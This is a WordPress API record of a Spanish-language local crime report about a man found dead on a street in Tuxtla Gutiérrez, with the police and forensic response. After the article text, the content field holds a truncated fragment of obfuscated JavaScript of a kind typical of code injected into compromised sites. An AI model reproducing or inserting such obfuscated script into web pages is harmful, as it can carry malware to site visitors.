{"id":9364,"date":"2023-04-04T00:52:29","date_gmt":"2023-04-04T00:52:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9364"},"modified":"2023-04-04T00:52:29","modified_gmt":"2023-04-04T00:52:29","slug":"muere-integrante-de-escuadron-de-la-muerte-en-la-via-publica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9364","title":{"rendered":"Muere integrante de Escuadr\u00f3n de la Muerte en la v\u00eda p\u00fablica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230403-WA0034-1024x577.jpg\" alt=\"\" class=\"wp-image-9365\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230403-WA0034-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230403-WA0034-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230403-WA0034-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230403-WA0034-1536x865.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230403-WA0034.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 3 de abril del 2023. Tuxtla Guti\u00e9rrez.- Un hombre perdi\u00f3 la vida en calles de la delegaci\u00f3n Ter\u00e1n, este lunes por la ma\u00f1ana.<\/p>\n\n\n\n<p>Fueron los mismos vecinos los que reportaron que en una jardinera a la altura de la 5a Oriente entre 5a y 6a Sur se encontraba un hombre tirado sin movimiento y llamaron a los n\u00fameros de emergencias.<\/p>\n\n\n\n<p>Al llegar al lugar los elementos de la polic\u00eda intentaron reanimarlo pero no respondi\u00f3.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos para valorar al sujeto de unos 55 a\u00f1os de edad pero ya hab\u00eda muerto.<\/p>\n\n\n\n<p>La zona fue acordonada por elementos de la polic\u00eda.<\/p>\n\n\n\n<p>Peritos de la Fiscal\u00eda General del Estado arribaron al lugar para realizar las diligencias correspondientes levantar el cuerpo y trasladarlo al SEMEFO donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 3 de abril del 2023. Tuxtla Guti\u00e9rrez.- Un hombre perdi\u00f3 la vida en calles de la delegaci\u00f3n Ter\u00e1n, este lunes por la ma\u00f1ana. Fueron los mismos vecinos los que reportaron que en una jardinera a la altura de la 5a Oriente entre 5a y 6a Sur se encontraba un hombre tirado &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9365,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9364","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9364","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9364"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9364\/revisions"}],"predecessor-version":[{"id":9366,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9364\/revisions\/9366"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9365"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9364"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9364"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9364"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}